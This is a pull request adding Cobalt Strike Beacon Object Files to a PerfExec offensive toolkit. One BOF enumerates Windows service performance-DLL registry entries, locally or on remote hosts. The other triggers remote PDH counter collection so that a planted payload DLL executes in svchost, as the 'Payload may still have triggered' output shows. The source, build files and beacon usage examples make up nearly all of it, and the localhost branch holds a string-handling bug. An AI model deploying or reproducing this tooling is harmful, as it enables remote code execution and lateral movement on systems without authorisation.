### PR TITLE
BOF Implementations of Gather and Diagrun Collection

### DIFF
--- a/bof/Makefile
+++ b/bof/Makefile
@@ -1,0 +1,40 @@
+TRIGGER_NAME := perf-trigger
+GATHER_NAME := perf-gather
+CC_x64 := x86_64-w64-mingw32-gcc
+CC_x86 := i686-w64-mingw32-gcc
+STRIP_x64 := x86_64-w64-mingw32-strip
+STRIP_x86 := i686-w64-mingw32-strip
+CFLAGS := -masm=intel
+TRIGGER_LIBS := -l pdh
+GATHER_LIBS := -l advapi32
+
+bof: bof_64 bof_86
+exe: exe_64 exe_86
+all: bof exe
+
+bof_64:
+	$(CC_x64) $(CFLAGS) -o dist/$(TRIGGER_NAME).x64.o -c src/$(TRIGGER_NAME).c -DBOF
+	$(CC_x64) $(CFLAGS) -o dist/$(GATHER_NAME).x64.o -c src/$(GATHER_NAME).c -DBOF
+	$(STRIP_x64) --strip-unneeded dist/$(TRIGGER_NAME).x64.o
+	$(STRIP_x64) --strip-unneeded dist/$(GATHER_NAME).x64.o
+
+bof_86:
+	$(CC_x86) $(CFLAGS) -o dist/$(TRIGGER_NAME).x86.o -c src/$(TRIGGER_NAME).c -DBOF
+	$(CC_x86) $(CFLAGS) -o dist/$(GATHER_NAME).x86.o -c src/$(GATHER_NAME).c -DBOF
+	$(STRIP_x86) --strip-unneeded dist/$(TRIGGER_NAME).x86.o
+	$(STRIP_x86) --strip-unneeded dist/$(GATHER_NAME).x86.o
+
+exe_64:
+	$(CC_x64) $(CFLAGS) -o dist/$(TRIGGER_NAME).x64.exe src/$(TRIGGER_NAME).c $(TRIGGER_LIBS)
+	$(CC_x64) $(CFLAGS) -o dist/$(GATHER_NAME).x64.exe src/$(GATHER_NAME).c $(GATHER_LIBS)
+	$(STRIP_x64) --strip-all dist/$(TRIGGER_NAME).x64.exe
+	$(STRIP_x64) --strip-all dist/$(GATHER_NAME).x64.exe
+
+exe_86:
+	$(CC_x86) $(CFLAGS) -o dist/$(TRIGGER_NAME).x86.exe src/$(TRIGGER_NAME).c $(TRIGGER_LIBS)
+	$(CC_x86) $(CFLAGS) -o dist/$(GATHER_NAME).x86.exe src/$(GATHER_NAME).c $(GATHER_LIBS)
+	$(STRIP_x86) --strip-all dist/$(TRIGGER_NAME).x86.exe
+	$(STRIP_x86) --strip-all dist/$(GATHER_NAME).x86.exe
+
+clean:
+	rm dist/*

--- a/bof/README.md
+++ b/bof/README.md
@@ -1,5 +1,5 @@
 # PerfExec BOF Tooling
-BOF tooling to complement `PerfExec.exe`
+These BOFs can be used with several other public BOFs to closely mimic `PerfExec.exe` functionality.
 
 ### Compiling
 Requires `mingw-w64`
@@ -43,4 +43,4 @@ beacon> perf-trigger "DNS" "Total Query Received" earth-dc.marvel.local
 [!] Payload may still have triggered
 ```
 
-The pre-existing `wmi_query` [BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF) can be leveraged to trigger collection using WMI
+The pre-existing `wmi_query` [BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF) can be leveraged to trigger collection using WMI.

--- a/bof/README.md
+++ b/bof/README.md
@@ -1,0 +1,46 @@
+# PerfExec BOF Tooling
+BOF tooling to complement `PerfExec.exe`
+
+### Compiling
+Requires `mingw-w64`
+```
+make
+```
+
+### Enumeration
+The `perf-gather` BOF can be used to enumerate service performance DLL info from the registry (local or remote)
+```
+beacon> perf-gather earth-dc.marvel.local
+[*] Gathering performance data from the registry on earth-dc.marvel.local
+[+] host called home, sent: 4843 bytes
+[+] received output:
+[*] Target: earth-dc.marvel.local
+[*] Enumerating Services subkeys...
+
+[+] HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Data\Performance
+ |_ PerfIniFile: _DataPerfCounters_d.ini
+ |_ Library: %systemroot%\system32\netfxperf.dll
+ |_ Open: OpenPerformanceData
+ |_ Collect: CollectPerformanceData
+ |_ Close: ClosePerformanceData
+
+ ...
+```
+
+### Trigger
+The `perf-trigger` BOF can trigger performance data collection (similar to `PerfExec.exe diagrun=true`)
+
+```
+beacon> perf-trigger "DNS" "Total Query Received" earth-dc.marvel.local
+[*] Triggering performance data collection on earth-dc.marvel.local
+[+] host called home, sent: 4853 bytes
+[+] received output:
+[*] Target: earth-dc.marvel.local
+[*] Object: DNS
+[*] Counter: Total Query Received
+
+[!] PdhAddCounterA failed with error code: -1073738824
+[!] Payload may still have triggered
+```
+
+The pre-existing `wmi_query` [BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF) can be leveraged to trigger collection using WMI

--- a/bof/perf.cna
+++ b/bof/perf.cna
@@ -1,0 +1,58 @@
+alias perf-gather {
+    $target = iff(-istrue $2, $2, "localhost");
+
+    $barch = barch( $1 );
+    $dhfs = openf( script_resource( "dist/perf-gather. $+ $barch $+ .o") );
+    $dhrw = readb( $dhfs, -1 );
+    closef( $dhfs );
+
+    if( $dhrw eq $null || $dhrw eq "" ) {
+        berror( $1, "Could not read perf-gather BOF" );
+        return;
+    }
+
+    $task = "Gathering performance data from the registry on " . $target;
+    btask( $1, $task );
+    $argvs = bof_pack( $1, "z", $target );
+    beacon_inline_execute( $1, $dhrw, "go", $argvs );
+}
+
+
+alias perf-trigger {
+    $object = $2;
+    $counter = $3;
+    $target = iff(-istrue $4, $4, "localhost");
+
+    if ( $object eq $null || $counter eq $null ) {
+        berror( $1, "Usage: perf-trigger <target> <object> <counter>" );
+        return;
+    }
+
+    $barch = barch( $1 );
+    $dhfs = openf( script_resource( "dist/perf-trigger. $+ $barch $+ .o") );
+    $dhrw = readb( $dhfs, -1 );
+    closef( $dhfs );
+
+    if( $dhrw eq $null || $dhrw eq "" ) {
+        berror( $1, "Could not read perf-trigger BOF" );
+        return;
+    }
+
+    $task = "Triggering performance data collection on " . $target;
+    btask( $1, $task );
+    $argvs = bof_pack( $1, "zzz", $object, $counter, $target );
+    beacon_inline_execute( $1, $dhrw, "go", $argvs );
+}
+
+
+beacon_command_register(
+    "perf-gather", 
+    "Gather performance data information from the registry", 
+    "Usage: perf-gather <optional: target>"
+)
+
+beacon_command_register(
+    "perf-trigger", 
+    "Trigger performance data collection",
+    "Usage: perf-trigger <object> <counter> <optional: target>"
+)

--- a/bof/src/beacon.h
+++ b/bof/src/beacon.h
@@ -1,0 +1,61 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Cobalt Strike 4.1.
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_ERROR       0x0d
+#define CALLBACK_OUTPUT_UTF8 0x20
+
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

--- a/bof/src/common.c
+++ b/bof/src/common.c
@@ -1,0 +1,87 @@
+// Ripped from https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/src/common/base.c
+#include <windows.h>
+#include "common.h"
+
+#ifndef bufsize
+#define bufsize 8192
+#endif
+
+#ifdef BOF
+
+char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
+WORD currentoutsize __attribute__((section (".data"))) = 0;
+HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error
+
+char * Utf16ToUtf8(const wchar_t* input);
+
+
+int bofstart()
+{   
+    output = (char*)MSVCRT$calloc(bufsize, 1);
+    currentoutsize = 0;
+    return 1;
+}
+
+void internal_printf(const char* format, ...){
+    int buffersize = 0;
+    int transfersize = 0;
+    char * curloc = NULL;
+    char* intBuffer = NULL;
+    va_list args;
+    va_start(args, format);
+    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
+    va_end(args);
+    
+    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
+    if (buffersize == -1)
+        return;
+    
+    char* transferBuffer = (char*)intAlloc(bufsize);
+    intBuffer = (char*)intAlloc(buffersize);
+    /*Print string to memory buffer*/
+    va_start(args, format);
+    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
+    va_end(args);
+    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
+    {
+        //BeaconFormatPrintf(&output, intBuffer);
+        MSVCRT$memcpy(output+currentoutsize, intBuffer, buffersize);
+        currentoutsize += buffersize;
+    }
+    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
+    {
+        curloc = intBuffer;
+        while(buffersize > 0)
+        {
+            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
+            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
+            {
+                transfersize = buffersize;
+            }
+            MSVCRT$memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
+            currentoutsize += transfersize;
+            //BeaconFormatPrintf(&output, transferBuffer); // copy it to cobalt strikes output buffer
+            if(currentoutsize == bufsize)
+            {
+            printoutput(FALSE); // sets currentoutsize to 0 and prints
+            }
+            MSVCRT$memset(transferBuffer, 0, transfersize); // reset our transfer buffer
+            curloc += transfersize; // increment by how much data we just wrote
+            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
+        }
+    }
+    intFree(intBuffer);
+    intFree(transferBuffer);
+}
+
+void printoutput(BOOL done)
+{
+
+    char * msg = NULL;
+    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
+    currentoutsize = 0;
+    MSVCRT$memset(output, 0, bufsize);
+    if(done) {MSVCRT$free(output); output=NULL;}
+}
+
+#endif

--- a/bof/src/common.h
+++ b/bof/src/common.h
@@ -1,0 +1,30 @@
+/* Print Handler */
+#ifdef BOF
+
+/* MSVCRT */
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements);
+WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
+WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg);
+
+/* KERNEL32 */
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
+WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+
+
+#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)
+#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
+
+int bofstart();
+void internal_printf(const char* format, ...);
+void printoutput(BOOL done);
+
+#else
+
+#define internal_printf printf
+#define printoutput 
+#define bofstart 
+
+#endif

--- a/bof/src/perf-gather.c
+++ b/bof/src/perf-gather.c
@@ -1,0 +1,136 @@
+#include <windows.h>
+#include <winreg.h>
+#include "perf-gather.h"
+
+#ifdef BOF
+#include "beacon.h"
+#else
+#include <stdio.h>
+#endif
+
+#include "common.c"
+
+#define MAX_KEY_LENGTH 256
+#define MAX_VALUE_NAME 512
+
+void execute(char* target) {
+    internal_printf("[*] Target: %s\n", target);
+    
+    HKEY hHKLM, hServices, hSubkey, hPerformance;
+    DWORD dwIndex = 0;
+    CHAR szSubkeyName[MAX_KEY_LENGTH];
+    DWORD dwSubkeyNameSize = sizeof(szSubkeyName);
+    LONG lResult;
+
+    BYTE szLibrary[MAX_VALUE_NAME];
+    BYTE szPerfIniFile[MAX_VALUE_NAME];
+    BYTE szOpen[MAX_VALUE_NAME];
+    BYTE szCollect[MAX_VALUE_NAME];
+    BYTE szClose[MAX_VALUE_NAME];
+    DWORD dwBufferSize = sizeof(szLibrary);
+    DWORD dwType = 0;
+
+    
+    /* Connect to HKLM on the target */
+    if (MSVCRT$strcmp(target, "localhost") == 0) {
+        lResult = ADVAPI32$RegConnectRegistryA(NULL, HKEY_LOCAL_MACHINE, &hHKLM);
+    }
+    else {
+        lResult = ADVAPI32$RegConnectRegistryA(target, HKEY_LOCAL_MACHINE, &hHKLM);
+    }
+
+    if (lResult != ERROR_SUCCESS) {
+        internal_printf("[!] RegConnectRegistryA failed with code %d\n", lResult);
+        return;
+    }
+ 
+    /* Enumerate services */
+    lResult = ADVAPI32$RegOpenKeyExA(hHKLM, "SYSTEM\\CurrentControlSet\\Services", 0, KEY_READ, &hServices);
+    if (lResult != ERROR_SUCCESS) {
+        internal_printf("[!] RegOpenKeyExA failed with code %d\n", lResult);
+        ADVAPI32$RegCloseKey(hHKLM);
+        return;
+    }
+
+    internal_printf("[*] Enumerating Services subkeys...\n\n");
+
+    /* Loop through services subkeys*/
+    while ((lResult = ADVAPI32$RegEnumKeyExA(hServices, dwIndex, szSubkeyName, &dwSubkeyNameSize, NULL, NULL, NULL, NULL)) != ERROR_NO_MORE_ITEMS) {
+        if (lResult != ERROR_SUCCESS) {
+            internal_printf("[!] Error enumerating Services subkeys: %ld\n", lResult);
+            ADVAPI32$RegCloseKey(hServices);
+            ADVAPI32$RegCloseKey(hHKLM);
+            return;
+        }
+
+        lResult = ADVAPI32$RegOpenKeyExA(hServices, szSubkeyName, 0, KEY_READ, &hSubkey);
+        if (lResult == ERROR_SUCCESS) {
+
+            /* Check if Performance subkey exists*/
+            if (ADVAPI32$RegOpenKeyExA(hSubkey, "Performance", 0, KEY_READ, &hPerformance) == ERROR_SUCCESS) {
+                internal_printf("[+] HKLM\\SYSTEM\\CurrentControlSet\\Services\\%s\\Performance\n", szSubkeyName);
+
+                /* Grab library, INI file name and Open/Close/Collect func names */
+                const char* values[] = {"PerfIniFile", "Library" , "Open", "Collect", "Close"};
+                BYTE* buffers[] = {szLibrary, szPerfIniFile, szOpen, szCollect, szClose};
+
+                for (int i = 0; i < sizeof(values) / sizeof(values[0]); i++) {
+                    MSVCRT$memset(buffers[i], 0, dwBufferSize);
+                    dwBufferSize = sizeof(szLibrary);
+
+                    lResult = ADVAPI32$RegQueryValueExA(hPerformance, values[i], NULL, &dwType, buffers[i], &dwBufferSize);
+                    if (lResult == ERROR_SUCCESS) {
+                        internal_printf(" |_ %s: %s\n", values[i], buffers[i]);
+                    }
+                }
+
+                ADVAPI32$RegCloseKey(hPerformance);
+            }
+            ADVAPI32$RegCloseKey(hSubkey);
+        }
+
+        dwIndex++;
+        dwSubkeyNameSize = sizeof(szSubkeyName);
+    }
+
+    /* Close reg handles */
+    ADVAPI32$RegCloseKey(hServices);
+    ADVAPI32$RegCloseKey(hHKLM);
+    
+    return;
+}
+
+#ifdef BOF
+void go(IN PCHAR Args, IN ULONG Length) {
+	char* target = NULL;
+	
+	datap parser;
+	BeaconDataParse(&parser, Args, Length);
+	target = (char*)BeaconDataExtract(&parser, NULL);
+    
+    if(!bofstart())
+	{
+		return;
+	}
+
+	execute(target);
+    printoutput(TRUE);
+	return;
+}
+
+#else
+
+int main(int argc, char* argv[]) {
+    char* target;
+    if (argc < 2) {
+		target = "localhost";
+	}
+    else {
+	    target = argv[1];
+    }
+    
+    execute(target);
+    return 0;
+}
+
+#endif

--- a/bof/src/perf-gather.h
+++ b/bof/src/perf-gather.h
@@ -1,0 +1,27 @@
+#ifdef BOF
+
+/* ADVAPI32 */
+WINADVAPI LONG WINAPI ADVAPI32$RegConnectRegistryA(LPCSTR lpMachineName, HKEY hKey, PHKEY phkResult);
+WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
+WINADVAPI LONG WINAPI ADVAPI32$RegEnumKeyExA(HKEY hKey, DWORD dwIndex, LPSTR lpName, LPDWORD lpcName, LPDWORD lpReserved, LPSTR lpClass, LPDWORD lpcClass, PFILETIME lpftLastWriteTime);
+WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData);
+WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY hKey);
+
+/* MSVCRT */
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2);
+
+#else
+
+/* ADVAPI32 */
+#define ADVAPI32$RegConnectRegistryA RegConnectRegistryA
+#define ADVAPI32$RegOpenKeyExA RegOpenKeyExA
+#define ADVAPI32$RegEnumKeyExA RegEnumKeyExA
+#define ADVAPI32$RegQueryValueExA RegQueryValueExA
+#define ADVAPI32$RegCloseKey RegCloseKey
+
+/* MSVCRT */
+#define MSVCRT$memset memset
+#define MSVCRT$strcmp strcmp
+
+#endif

--- a/bof/src/perf-trigger.c
+++ b/bof/src/perf-trigger.c
@@ -1,0 +1,117 @@
+#include <windows.h>
+#include <pdh.h>
+#include <pdhmsg.h>
+#include "perf-trigger.h"
+
+#ifdef BOF
+#include "beacon.h"
+#else
+#include <stdio.h>
+#endif
+
+#include "common.c"
+
+#define BUF_SIZE 512
+
+void execute(char* target, char* object, char* counter) {
+    internal_printf("[*] Target: %s\n", target);
+    internal_printf("[*] Object: %s\n", object);
+    internal_printf("[*] Counter: %s\n\n", counter);
+
+    /* Set the PDH CounterPath */
+    char* pathHead = "\\\\";
+    char* pathSeparator = "\\";
+    char* pathTail = "\x00";
+
+    char* fullPath;
+
+    if (MSVCRT$strcmp(target, "localhost") == 0) {
+        fullPath = MSVCRT$malloc(MSVCRT$strlen(pathSeparator) +  MSVCRT$strlen(object) + MSVCRT$strlen(pathSeparator) + MSVCRT$strlen(counter) + MSVCRT$strlen(pathTail) + 1);
+    }
+    else {
+        fullPath = MSVCRT$malloc(MSVCRT$strlen(pathHead) + MSVCRT$strlen(target) + MSVCRT$strlen(pathSeparator) +  MSVCRT$strlen(object) + MSVCRT$strlen(pathSeparator) + MSVCRT$strlen(counter) + MSVCRT$strlen(pathTail) + 1);
+        MSVCRT$strcpy(fullPath, pathHead);
+	    MSVCRT$strcat(fullPath, target);
+    }
+
+	MSVCRT$strcat(fullPath, pathSeparator);
+    MSVCRT$strcat(fullPath, object);
+    MSVCRT$strcat(fullPath, pathSeparator);
+    MSVCRT$strcat(fullPath, counter);
+    MSVCRT$strcat(fullPath, pathTail);
+
+    /* Trigger Performance Data Collection */
+    PDH_HQUERY hQuery;
+    PDH_HCOUNTER hCounter;
+
+    PDH_STATUS status = PDH$PdhOpenQuery(NULL, NULL, &hQuery);
+    if (status != ERROR_SUCCESS) {
+        internal_printf("[!] PdhOpenQuery failed with error code: %d\n", status);
+        MSVCRT$free(fullPath);
+        return;
+    }
+
+    status = PDH$PdhAddCounterA(hQuery, fullPath, 0, &hCounter);
+    if (status != ERROR_SUCCESS) {
+        internal_printf("[!] PdhAddCounterA failed with error code: %d\n", status);
+        internal_printf("[!] Payload may still have triggered\n");
+        PDH$PdhCloseQuery(hQuery);
+        MSVCRT$free(fullPath);
+        return;
+    }
+
+    internal_printf("[+] PdhAddCounterA call successful\n");
+    
+    PDH$PdhCloseQuery(hQuery);
+    MSVCRT$free(fullPath);
+    return;
+}
+
+#ifdef BOF
+void go(IN PCHAR Args, IN ULONG Length) {
+	char* target = NULL;
+    char* object = NULL;
+    char* counter = NULL;
+	
+	datap parser;
+	BeaconDataParse(&parser, Args, Length);
+    object = (char*)BeaconDataExtract(&parser, NULL);
+    counter = (char*)BeaconDataExtract(&parser, NULL);
+    target = (char*)BeaconDataExtract(&parser, NULL);
+    
+    if(!bofstart())
+	{
+		return;
+	}
+
+	execute(target, object, counter);
+    printoutput(TRUE);
+	return;
+}
+
+#else
+
+int main(int argc, char* argv[]) {
+    if (argc < 3) {
+		internal_printf("[!] Missing arguments\n");
+        internal_printf("[!] Usage: %s <object> <counter> <optional: target>\n", argv[0]);
+		return 0;
+	}
+
+	
+    char* category = argv[1];
+    char* counter = argv[2];
+    char* target;
+
+    if (argc == 3){
+        target = "localhost";
+    }
+    else {
+        target = argv[3];
+    }
+    
+    execute(target, category, counter);
+    return 0;
+}
+
+#endif

--- a/bof/src/perf-trigger.h
+++ b/bof/src/perf-trigger.h
@@ -1,0 +1,35 @@
+#ifdef BOF
+
+/* MSVCRT */
+WINBASEAPI SIZE_T WINAPI MSVCRT$strlen(const char* str);
+DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2);
+WINBASEAPI void* WINAPI MSVCRT$strcpy(const char* dest, const char* source);
+WINBASEAPI void* WINAPI MSVCRT$strcat(const char* dest, const char* source);
+WINBASEAPI void* __cdecl MSVCRT$malloc( size_t size);
+WINBASEAPI void __cdecl MSVCRT$free( void* memblock);
+
+/* PDH */
+WINBASEAPI int __cdecl PDH$PdhOpenQuery(LPCSTR szDataSource, DWORD_PTR dwUserData, PDH_HQUERY *phQuery);
+WINBASEAPI int __cdecl PDH$PdhAddCounterA(PDH_HQUERY hQuery, LPCSTR szFullCounterPath, DWORD_PTR dwUserData, PDH_HCOUNTER *phCounter);
+WINBASEAPI int __cdecl PDH$PdhCollectQueryData(PDH_HQUERY hQuery);
+WINBASEAPI int __cdecl PDH$PdhCloseQuery(PDH_HQUERY hQuery);
+
+#else
+
+/* MSVCRT */
+#define MSVCRT$strlen strlen
+#define MSVCRT$strcmp strcmp
+#define MSVCRT$strcpy strcpy
+#define MSVCRT$strcat strcat
+#define MSVCRT$malloc malloc
+#define MSVCRT$free free
+#define MSVCRT$malloc malloc
+#define MSVCRT$free free
+
+/* PDH */
+#define PDH$PdhOpenQuery PdhOpenQuery
+#define PDH$PdhAddCounterA PdhAddCounterA
+#define PDH$PdhCollectQueryData PdhCollectQueryData
+#define PDH$PdhCloseQuery PdhCloseQuery
+
+#endif


### PR DESCRIPTION
Adds code for two BOFs.

- perf-gather - collect service performance DLL information from the registry, locally or remotely. Queries the values of PerfIniFile, Library, Open, Collect and Close.
- perf-trigger - Trigger data collection using PDH functions (similar to diagrun, causes collection originating from `svchost.exe`)

Only ported those 2 actions to BOFs since other PerfExec.exe functionality can be mimicked with BOFs from TrustedSec, namely wmi_query and reg_set.

Note: perf-trigger seems to be less reliable than the PerfExec.exe equivalent. Usually works the first time, periodically or after reboots. Collection does not seem to happen if called quickly in succession.